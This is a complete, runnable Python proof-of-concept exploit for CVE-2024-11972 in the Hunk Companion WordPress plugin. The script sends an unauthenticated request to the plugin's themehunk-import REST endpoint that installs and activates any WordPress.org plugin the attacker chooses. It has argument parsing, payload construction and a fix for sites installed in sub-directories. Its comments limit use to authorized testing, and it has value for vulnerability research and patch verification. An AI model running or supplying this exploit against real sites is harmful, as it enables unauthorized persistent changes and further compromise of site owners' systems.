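#!/usr/bin/env python3
# Exploit Title: Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation
# Date: 16 December, 2024
# Exploit Author: Jun Takemura
# Author's GitHub: https://github.com/JunTakemura
# Author's Blog: juntakemura.dev
# Vendor Homepage: https://themehunk.com
# Software Link: https://wordpress.org/plugins/hunk-companion/
# Version: Tested on Hunk Companion 1.8.8
# CVE: CVE-2024-11972
# Vulnerability Description:
# Exploits a flaw in the Hunk Companion plugin's permission_callback for the
# /wp-json/hc/v1/themehunk-import endpoint, allowing unauthenticated attackers
# to install and activate arbitrary plugins from the WordPress.org repository.
# Tested on: Ubuntu
# Original vulnerability discovered by: Daniel Rodriguez
#
# Usage:
#   python3 exploit.py <target_url> <plugin_slug> [--timeout SECONDS]
#   or edit `target_url` / `plugin_name` below and run: python3 exploit.py
#
# NOTE: Only run this against WordPress installations you are explicitly
# authorized to test. A successful request installs AND activates a plugin on
# the target -- a persistent change that must be recorded and cleaned up.
#
import argparse
import sys
from urllib.parse import urljoin, urlsplit

# Update 'URL' with your target WordPress site URL, for example "http://localhost/wordpress"
target_url = "URL"
# Update 'NAME' with desired plugin's name (slug), for example "wp-query-console"
plugin_name = "NAME"

endpoint = "/wp-json/hc/v1/themehunk-import"

# Generic browser UA. No cookie or REST nonce is sent: the bug is that the
# endpoint's permission_callback lets the request through without either.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
    "Content-Type": "application/json",
}


def build_url(target: str, path: str = endpoint) -> str:
    """Return the absolute URL of the vulnerable REST route under *target*.

    The original script called ``urljoin(target, "/wp-json/...")``. Because
    the route starts with ``/``, ``urljoin`` discards the base URL's own path,
    so a site installed in a sub-directory (the documented example
    ``http://localhost/wordpress``) was requested at
    ``http://localhost/wp-json/...`` and the exploit silently missed.
    Normalising both sides (base ends with ``/``, route does not start with
    one) keeps the sub-directory.

    Args:
        target: Absolute http(s) URL of the WordPress site, with or without a
            trailing slash.
        path: REST route to append; defaults to the Hunk Companion import route.

    Raises:
        ValueError: if *target* has no http(s) scheme or host, e.g. the
            ``"URL"`` placeholder was never replaced.
    """
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError(f"target_url must be an absolute http(s) URL, got {target!r}")
    return urljoin(target.rstrip("/") + "/", path.lstrip("/"))


def build_payload(target: str, slug: str) -> dict:
    """Return the JSON body sent to the import endpoint.

    ``params.plugin`` (slug -> display label) and ``params.allPlugins``
    (slug -> main plugin file) carry the attacker-chosen slug; the other
    keys are copied verbatim from the original PoC -- whether the handler
    validates them was not checked here.

    Args:
        target: The site URL, echoed back to the endpoint as ``wpUrl``.
        slug: WordPress.org plugin slug to install and activate.

    Raises:
        ValueError: if *slug* is empty or still the ``"NAME"`` placeholder.
    """
    if not slug or slug == "NAME":
        raise ValueError("plugin_name must be set to a WordPress.org plugin slug")
    return {
        "params": {
            "plugin": {slug: "Plugin Label"},
            # Assumes the plugin's main file is <slug>/<slug>.php. That is the
            # common layout but not guaranteed; if activation fails for a
            # plugin whose main file is named differently, adjust this entry.
            "allPlugins": [{slug: f"{slug}/{slug}.php"}],
            "themeSlug": "theme",
            "proThemePlugin": "plugin",
            "templateType": "free",
            "tmplFreePro": "theme",
            "wpUrl": target,
        }
    }


def main(argv=None) -> int:
    """Parse arguments, send the import request and print the raw response.

    Args:
        argv: Command-line arguments (defaults to ``sys.argv[1:]``). Both
            positionals are optional and fall back to the module constants.

    Returns:
        Process exit code: 0 when the target answered 2xx, 1 on bad input or
        any transport/HTTP error. A 2xx only proves the endpoint accepted the
        request; whether the plugin was actually installed has to be read from
        the printed body (or verified on the target).
    """
    # Imported here so build_url/build_payload stay importable (and testable)
    # on a machine without the third-party `requests` package.
    import requests

    parser = argparse.ArgumentParser(description="CVE-2024-11972 PoC - Hunk Companion unauthenticated plugin install")
    parser.add_argument("target", nargs="?", default=target_url,
                        help="WordPress site URL, e.g. http://localhost/wordpress")
    parser.add_argument("slug", nargs="?", default=plugin_name,
                        help="WordPress.org plugin slug to install, e.g. wp-query-console")
    # The target fetches the plugin from WordPress.org before answering, so a
    # slow install can legitimately exceed the 10 s default; raise it if the
    # request keeps timing out.
    parser.add_argument("--timeout", type=float, default=10.0,
                        help="seconds to wait for the response (default: 10)")
    args = parser.parse_args(argv)

    try:
        url = build_url(args.target)
        payload = build_payload(args.target, args.slug)
    except ValueError as exc:
        print(f"[-] {exc}")
        return 1

    try:
        response = requests.post(url, json=payload, headers=headers, timeout=args.timeout)
        response.raise_for_status()  # Raises an HTTPError if the response is not 2xx
    except requests.exceptions.RequestException as exc:
        print(f"[-] Request failed: {exc}")
        return 1

    print("[+] Exploit sent successfully.")
    print(f"Response Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
    return 0


if __name__ == "__main__":
    sys.exit(main())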